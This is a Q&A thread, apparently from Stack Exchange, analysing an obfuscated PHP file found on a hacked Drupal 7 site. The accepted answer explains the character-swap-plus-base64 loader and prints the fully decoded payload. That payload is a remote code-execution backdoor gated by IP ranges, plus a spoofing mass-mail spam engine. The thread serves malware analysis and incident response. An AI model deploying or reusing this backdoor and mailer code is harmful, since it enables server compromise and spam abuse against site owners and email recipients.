    'GjYgmW9R1r9RQ4YgZcYgKy8sL497L467N28zU4HyPjYALMUfK397ZPKBmtUBhX6AKbb2N'.
    'vY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jY2NWRBZACJPjYgGj'.
    'YgGjYGPjYgGjYgGjYB2zSgGObB1We7rM7WUV9RmP8sldRxGcixGdahcpwgbjSxGObzwNU7wMUgGvixG'.
    'O9B14ep3SYgGjYgGjYgGSYgGjYgGjYgkG9dUWHRm2YgjO9dG3KfK2'.
    'bRw2bElXCWGnSAkp97LOYfK2bRw2bEljSAFSYgGjYgGjYgGSYgGjYgGjYgGObz'.
    'wMYy4jYAYTYgmP971O9RKMYy4jYAYTYgmPRsm2UBw0UBwOYy4j9z13bsaTgAGjYgGjYgGjUstX8BaPYg1G9zwn'.
    '9AjO9dGXYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgmW9R5j604jlB9W971OS'.
    'gmzbgJj5pGWQgOTYgFIYQBf460mjVgJ46RlngylvVg+46EmjVg'.
    'r46EmjAGI6JPjYgGjgAGjYgGjYgGjYgGjYgFIYQgu4eylnVgW46RmjQgD46Gj46El3QgT'.
    '460mtcgZ4eFj46ul3QgM46nlnVgW46qlnVgWYQgWYQgD46TlnUBg46RlnUBg46ajSAFSY'.
    'gGjYgGjYgGjYgGjH7ePYghjKBtu9Bw497Q497ljKAejbEmWbBcMSgmW9R53YgKbb2NvRfKb8'.
    'AYXYp4cmO15a4ajSlPjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGnSAylVcgJ46ilnVgT46Tl3VgD46jj4'.
    'eilVVgrYQBk4eulvQBg46ylnUB6Yg4j46qlnVBG4eylVUgD4e6lvQBG4eilVUgFYQgD46TlnUBg46RlnUBgYg'.
    'PngAGjYgGjYgGjYgGjYgGjYgGOH1cO9Rm2eEm29gGcYfmWU7aTgAGjYgGjYgGjYg'.
    'GjYgGjYgGSYgGjYgGjYgGjYgGjYgGjYgmP971O9RKMYy4jbEwAbEmWSgmW9R53YyG3YfQ4bdknbWjObzwM6gG'.
    'ARfKb82NWRBZASxOTgAGjYgGjYgGjYgGjYgGjYgGObzwMYy4jbEwAbEmWSgmW9R53YfQ4bdknbWjObzwM6gGARfKb82NWRBZAS'.
    'x34Sp3SYgGjYgGjYgGjYgGjYgGjYGPjYgGjYgGjYgGjYgGjYgGj6WPjxBwt9Bw'.
    'WbWk48WkkbdKtoxGI6JPjYgGjYgGjYgGjYgGjYgGjH7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4dHBwt9BwWbWbjufJjKfktbz1Vb'.
    'r3dbzw4URKvKr4cixUtbdKtoxbSYgGjYgGjYgGjYgGjYgGjYgGjYgkFugGPHRQM9RlPKfkt'.
    'bz1Vbr3dbzwOHRK2eEldRxOjKAejKfktbz1Vbr3dbzwOHRK2eE'.
    'ldRp4cUfKr9xOjSlPjYgGjYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgmPYy4j9RtJ8BcO9xjARfKb8AY3Yg'.
    'mP971O9RKMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGOHBwt9BwWbWGcYB1Wbz1LSgOTgAGjYgGjYgGjYg'.
    'GjYgGjYgGjYgGj9zcW9710HgjjKBjjeR5jKB3ciAmsYgOSYgGjYgGjY'.
    'gGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgk'.
    'MUfKJ8E5PKfe3YgbDKWOjSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
    'YgGOHWGcYfQredQ4bAjOUAJj5gJjbEmWbBcMSgms6gGdCAbXSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjY'.
    'gGjYgmsYy4jUfKX8xtMU7KMUfYPKfe3YfQ4bdknbWjOUAJjKMPdSx3NSxOTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgG'.
    'jYf4SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjKBt2e7m2bdQ8bEmWUBcrbfk2bAjOHW2UYy4jKfeTgAGjYgGjYgGjYgG'.
    'jYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjH7ePYB2Mb'.
    'sw4SgmJeRKt8RQ8KEK29B2W97Q4Kr4XYgezYgmJeRKt8RQ8KEK29B2W97Q4Kr4ciRmWU7ajKAejH'.
    'RQM9RlPKBt2e7m2bdQ8K4Nil41axacCKr4XYgOSYgGjYgGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgG'.
    'jYgGjYgGjYgGObB1We7rM7WUrbzJdRxGcYgmP971O9RKM7WU5p4Qkwh2ipAUUCJ'.
    'PjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgGtHRQM9RlPKfktbz1Vbr3dbzwOHRK2eEl'.
    'Vescr8dldRxOjSxGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUYy4j5y3SYgGjYgG'.
    'jYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzwOHRK2eElVescr8dldRpJN5gGXgAGjYgGjYgGjYgGjYgGj'.
    'YgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUS'.
    'W3TgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgmzU7L0Yy4jRrcBwaLywh2ip2cuCJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
    'YgkW9RmrbzZjlB2MRscAHzw0UgjOUBtXbWOjiWGOUBtXbW4+KB9r8'.
    'z5PKfktbz1VbWOjCAGO9dwveWjObB1We7rMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgk'.
    'cgAGjYgGjYgGjYgGjYgGjYgkcgAGjYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzw4URKvKr4cixUP971O9RKMKWGXYfK2'.
    'UfwW8AGOHBwt9BwWbM3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYf4SYgGjYgGjYgGSYgGjYgGjYgkG9zQ38EQ2SgmzbgOTgA'.
    'GjYgkcgAGjYgk28fQ2YfK2UfwW8AkBlaNpmp3nSAGO9RKWbEmW6Am2bdKv8M3jSAFSYgGjYGPjYgGjH'.
    '7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4deRKWeROdYgOjKfK2bWGcYB1Wbz1LSgUP971O9RKMKM4+KBt2e7'.
    'm2bd53YgU08sL497L4KM4+KfK2bWOTgAGjYgGSYgGjYfK2UfwW'.
    '8AGObzwMCJXc';
    eval(v78ZFAX($vFHLJ89, $vIIJ30Y));?>
    

    I believe it was used for sending the spams such us:

    To: <[email protected]>
    Subject: 55th Anniversary and Free Pizza
    X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code
    

    But how? What's the method of its action?


    A bit of more background:

    It was found in Drupal 7 instance at sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php, however the file and code can vary depending on the hack.

    One user reported it in sites/all/modules/i18n/i18n_block/stats7.php and the content of this script was a bit different:

    <?php
    $vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i');
    function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
    return base64_decode($v8YITRE);}
    $vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'.
    'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'.
    

    Usually either sending spam, DoS, or just a basic file browser to upload more malware or attempt to execute shell commands. You're better off looking how this script got there in the first place rather than what it does.

    I've found similar code at this blog post and here the `http_request()` at gist code.

    No, the idiots who made this piece of garbage just Googled for how to make an HTTP request in PHP and copy/pasted his code.

    Similar PHP exploit scripts were uploaded here for education purposes: A collection of PHP exploit scripts.

    This is actually easy to decode, by changing `eval` to `echo`:)

    For anyone willing to decode this very quickly: replace the eval by an echo, and execute the script manually `php that_file.php > decoded.txt`, then open `decoded.txt`. Voila!

  • armani

    armani Correct answer

    6 years ago

    The last line performs an eval() of function v78ZFAX() given the two parameters like so:

    eval(v78ZFAX($vFHLJ89, $vIIJ30Y));
    

    That first parameter is the part that takes up the bulk of the code. It is assigned all that random-looking garbage, with . concatenating all those strings together into one long string:

    $vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk' ...
    

    The second parameter is this array, which maps certain letters/numbers to other letters/numbers:

    $vIIJ30Y = Array(
        '1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');
    

    The function itself can be re-written as this for clarity:

    function v78ZFAX($vJOJJ7T, $vRJ8WGX)
    {
        $vM74216 = ''; 
        for($i=0; $i < strlen($vJOJJ7T); $i++)
        {
            $vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];
        }
        return base64_decode($vM74216);
    }
    

    It starts by declaring a blank variable vM74216 and then for each digit of the first variable (the super long one) it adds a character to this currently-blank variable. The digit it adds depends on the outcome of the ternary condition used by the isset() function, which simply checks to see if that i-th digit of the huge number has a corresponding lookup entry in the character mapping array.

    At the end of it all, it Base64 decodes the resultant variable, which gets passed as the derived parameter of the initial eval() function.

    The whole point is obfuscation. It looks like a jumbled mess, but characters get swapped, concatenated, etc. until its payload is unleashed. This is done to prevent an analyst from immediately knowing the nature of the script, as well as bypassing signature-based antivirus techniques.

    EDIT

    Using this hack of a Python script (I'm just more comfortable in Python):

    import base64
    
    TheArray = {'1':'F', '0':'j', '3':'s', '2':'l', '5':'M', '4':'0', '7':'W', '6':'L', '9':'Z', '8':'b', 'A':'i', 'C':'O', 'B':'G', 'E':'3', 'D':'6', 'G':'A', 'F':'8', 'I':'q', 'H':'a', 'K':'J', 'J':'w', 'M':'z', 'L':'5', 'O':'k', 'N':'x', 'Q':'N', 'P':'o', 'S':'K', 'R':'X', 'U':'d', 'T':'7', 'W':'y', 'V':'t', 'Y':'I', 'X':'p', 'Z':'4', 'a':'U', 'c':'9', 'b':'c', 'e':'Y', 'd':'n', 'g':'C', 'f':'H', 'i':'P', 'h':'E', 'k':'B', 'j':'g', 'm':'R', 'l':'Q', 'o':'e', 'n':'v', 'q':'r', 'p':'T', 's':'2', 'r':'1', 'u':'f', 't':'h', 'w':'V', 'v':'u', 'y':'D', 'x':'S', 'z':'m'}
    
    LongVar = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'+'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'+'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'+'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'+'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'+'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'+'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'+'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'+'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'+'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'+'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'+'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'+'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'+'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'+'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'+'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'+'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'+'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'+'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'+'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'+'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'+'t8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'+'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'+'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'+'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'+'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'+'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'+'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'+'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'+'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'+'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.... TRIMMED FOR SE ANSWER CHAR COUNT
    
    NewVar = ''
    
    for i in LongVar:
        if i in TheArray:
            NewVar += TheArray[i]
        else:
            NewVar += i
    
    print base64.b64decode(NewVar)
    

    I was able to derive the obfuscated payload as:

    if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
    {
        eval(base64_decode($_POST["code"]));
        exit();
    }
    
    if (isset($_POST["type"]) && $_POST["type"]=="1")
    {
        type1_send();
        exit();
    }
    elseif (isset($_POST["type"]) && $_POST["type"]=="2")
    {
    
    }
    elseif (isset($_POST["type"]))
    {
        echo $_POST["type"];
        exit();
    }
    
    error_404();
    
    function is_good_ip($ip)
    {
        $goods = Array("6.185.239.", "8.138.118.");
    
        foreach ($goods as $good)
        {
            if (strstr($ip, $good) != FALSE)
            {
                return TRUE;
            }
        }
    
        return FALSE;
    }
    
    function type1_send()
    {
        if(!isset($_POST["emails"])
                OR !isset($_POST["themes"])
                OR !isset($_POST["messages"])
                OR !isset($_POST["froms"])
                OR !isset($_POST["mailers"])
        )
        {
            exit();
        }
    
        if(get_magic_quotes_gpc())
        {
            foreach($_POST as $key => $post)
            {
                $_POST[$key] = stripcslashes($post);
            }
        }
    
        $emails = @unserialize(base64_decode($_POST["emails"]));
        $themes = @unserialize(base64_decode($_POST["themes"]));
        $messages = @unserialize(base64_decode($_POST["messages"]));
        $froms = @unserialize(base64_decode($_POST["froms"]));
        $mailers = @unserialize(base64_decode($_POST["mailers"]));
        $aliases = @unserialize(base64_decode($_POST["aliases"]));
        $passes = @unserialize(base64_decode($_POST["passes"]));
    
        if(isset($_SERVER))
        {
            $_SERVER['PHP_SELF'] = "/"; 
            $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
            if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
            {
                $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
            }
        }
    
        if(isset($_FILES))
        {
            foreach($_FILES as $key => $file)
            {
                $filename = alter_macros($aliases[$key]);
                $filename = num_macros($filename);
                $filename = text_macros($filename);
                $filename = xnum_macros($filename);
                $_FILES[$key]["name"] = $filename;
            }
        }
    
        if(empty($emails))
        {
            exit();
        }
    
        foreach ($emails as $fteil => $email)
        {
            $theme = $themes[array_rand($themes)];
            $theme = alter_macros($theme["theme"]);
            $theme = num_macros($theme);
            $theme = text_macros($theme);
            $theme = xnum_macros($theme);
    
            $message = $messages[array_rand($messages)];
            $message = alter_macros($message["message"]);
            $message = num_macros($message);
            $message = text_macros($message);
            $message = xnum_macros($message);
            //$message = pass_macros($message, $passes);
            $message = fteil_macros($message, $fteil);
    
            $from = $froms[array_rand($froms)];
            $from = alter_macros($from["from"]);
            $from = num_macros($from);
            $from = text_macros($from);
            $from = xnum_macros($from);
    
            if (strstr($from, "[CUSTOM]") == FALSE)
            {
                $from = from_host($from);
            }
            else
            {
                $from = str_replace("[CUSTOM]", "", $from);
            }
    
            $mailer = $mailers[array_rand($mailers)];
    
            send_mail($from, $email, $theme, $message, $mailer);
        }
    }
    
    function send_mail($from, $to, $subj, $text, $mailer)
    {
        $head = "";
    
        $un = strtoupper(uniqid(time()));
    
        $head .= "From: $from\n";
        $head .= "X-Mailer: $mailer\n";
        $head .= "Reply-To: $from\n";
    
        $head .= "Mime-Version: 1.0\n";
        $head .= "Content-Type: multipart/alternative;";
        $head .= "boundary=\"----------".$un."\"\n\n";
    
        $plain = strip_tags($text);
        $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
        $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
    
        $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
        $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
        $zag .= "------------".$un."--";
    
        if(count($_FILES) > 0)
        {
            foreach($_FILES as $file)
            {
                if(file_exists($file["tmp_name"]))
                {
                    $f = fopen($file["tmp_name"], "rb");
                    $zag .= "------------".$un."\n";
                    $zag .= "Content-Type: application/octet-stream;";
                    $zag .= "name=\"".$file["name"]."\"\n";
                    $zag .= "Content-Transfer-Encoding:base64\n";
                    $zag .= "Content-Disposition:attachment;";
                    $zag .= "filename=\"".$file["name"]."\"\n\n";
                    $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
                    fclose($f);
                }
            }
        }
    
        if(@mail($to, $subj, $zag, $head))
        {
            if(!empty($_POST['verbose']))
                echo "SENDED";
        }
        else
        {
            if(!empty($_POST['verbose']))
                echo "FAIL";
        }
    }
    
    function alter_macros($content)
    {
        preg_match_all('#{(.*)}#Ui', $content, $matches);
    
        for($i = 0; $i < count($matches[1]); $i++)
        {
    
            $ns = explode("|", $matches[1][$i]);
            $c2 = count($ns);
            $rand = rand(0, ($c2 - 1));
            $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
        }
        return $content;
    }
    
    function text_macros($content)
    {
        preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
    
        for($i = 0; $i < count($matches[0]); $i++)
        {
            $min = $matches[1][$i];
            $max = $matches[2][$i];
            $rand = rand($min, $max);
            $word = generate_word($rand);
    
            $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
        }
    
        preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
    
        for($i = 0; $i < count($matches[0]); $i++)
        {
            $count = $matches[1][$i];
    
            $word  = generate_word($count);
    
            $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
        }
    
    
        return $content;
    }
    
    function xnum_macros($content)
    {
        preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
    
        for($i = 0; $i < count($matches[0]); $i++)
        {
            $num = $matches[1][$i];
            $min = pow(10, $num - 1);
            $max = pow(10, $num) - 1;
    
            $rand = rand($min, $max);
            $content = str_replace($matches[0][$i], $rand, $content);
        }
        return $content;
    }
    
    function num_macros($content)
    {
        preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
    
        for($i = 0; $i < count($matches[0]); $i++)
        {
            $min = $matches[1][$i];
            $max = $matches[2][$i];
            $rand = rand($min, $max);
            $content = str_replace($matches[0][$i], $rand, $content);
        }
        return $content;
    }
    
    function generate_word($length)
    {
        $chars = 'abcdefghijklmnopqrstuvyxz';
        $numChars = strlen($chars);
        $string = '';
        for($i = 0; $i < $length; $i++)
        {
            $string .= substr($chars, rand(1, $numChars) - 1, 1);
        }
        return $string;
    }
    
    function pass_macros($content, $passes)
    {
        $pass = array_pop($passes);
    
        return str_replace("[PASS]", $pass, $content);
    }
    
    function fteil_macros($content, $fteil)
    {    
        return str_replace("[FTEIL]", $fteil, $content);
    }
    
    function is_ip($str) {
      return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
    }
    
    function from_host($content)
    {
    
        $host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);
    
        if (is_ip($host))
        {
            return $content;
        }
    
        $tokens = explode("@", $content);
    
        $content = $tokens[0] . "@" . $host . ">";
    
        return $content;
    }
    
    function error_404()
    {
        header("HTTP/1.1 404 Not Found");
    
        $uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
    
        $content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
        $content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
    
        exit( $content );
    }
    
    
    function custom_http_request1($params)
    {
        if( ! is_array($params) )
        {
            $params = array(
                'url' => $params,
                'method' => 'GET'
            );
        }
    
        if( $params['url']=='' ) return FALSE;
    
        if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
        $params['method'] = strtoupper($params['method']);
        if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE; 
    
        /* Приводим ссылку в правильный вид */
        $url = parse_url($params['url']);
        if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
        if( ! isset($url['path']) ) $url['path'] = '/';
        if( ! isset($url['host']) && isset($url['path']) )
        {
            if( strpos($url['path'], '/') )
            {
                $url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
                $url['path'] = substr($url['path'], strpos($url['path'], '/'));
            }
            else
            {
                $url['host'] = $url['path'];
                $url['path'] = '/'; 
            }
        }
        $url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
        if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
    
        $port = isset($params['port']) ? $params['port']
                : ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
    
        $timeout = isset($params['timeout']) ? $params['timeout'] : 30;
        if( ! isset($params['return']) ) $params['return'] = 'content';
    
        $scheme = $url['scheme']=='https' ? 'ssl://':'';
        $fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
        if( $fp )
        {
            /* Mozilla */
            if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
    
            $request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
            $request .= "Host: {$url['host']}\r\n";
            $request .= "User-Agent: {$params['User-Agent']}"."\r\n";
            if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
            if( isset($params['cookie']) )
            {
                $cookie = "";
                if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
                else $cookie = $params['cookie'];
                if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
            }
            $request .= "Connection: close\r\n";
            if( $params['method']=='POST' )
            {
                if( isset($params['data']) && is_array($params['data']) )
                {
                    foreach($params['data'] AS $k => $v)
                        $data .= urlencode($k).'='.urlencode($v).'&';
                    if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
                }
                $data .= "\r\n\r\n";
    
                $request .= "Content-type: application/x-www-form-urlencoded\r\n";
                $request .= "Content-length: ".strlen($data)."\r\n";
            }
            $request .= "\r\n";
    
            if( $params['method'] == 'POST' ) $request .= $data;
    
            @fwrite ($fp,$request); /* Send request */
    
            $res = ""; $headers = ""; $h_detected = false;
            while( [email protected]($fp) )
            {
                $res .= @fread($fp, 1024); /* читаем контент */
    
                /* Проверка наличия загловков в контенте */
                if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
                {
                    /* заголовки уже считаны - корректируем контент */
                    $h_detected = true;
    
                    $headers = substr($res, 0, strpos($res, "\r\n\r\n"));
                    $res = substr($res, strpos($res, "\r\n\r\n")+4);
    
                    /* Headers to Array */
                    if( $params['return']=='headers' || $params['return']=='array'
                        || (isset($params['redirect']) && $params['redirect']==true) )
                    {
                        $h = explode("\r\n", $headers);
                        $headers = array();
                        foreach( $h as $k=>$v )
                        {
                            if( strpos($v, ':') )
                            {
                                $k = substr($v, 0, strpos($v, ':'));
                                $v = trim(substr($v, strpos($v, ':')+1));
                            }
                            $headers[strtoupper($k)] = $v;
                        }
                    }
                    if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
                    {
                        $params['url'] = $headers['LOCATION'];
                        if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
                        if( $params['redirect-count']<10 )
                        {
                            $params['redirect-count']++;
                            $func = __FUNCTION__;
                            return @is_object($this) ? $this->$func($params) : $func($params);
                        }
                    }
                    if( $params['return']=='headers' ) return $headers;
                }
            }
    
            @fclose($fp);
        }
        else return FALSE;/* $errstr.$errno; */
    
        if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
    
        return $res;
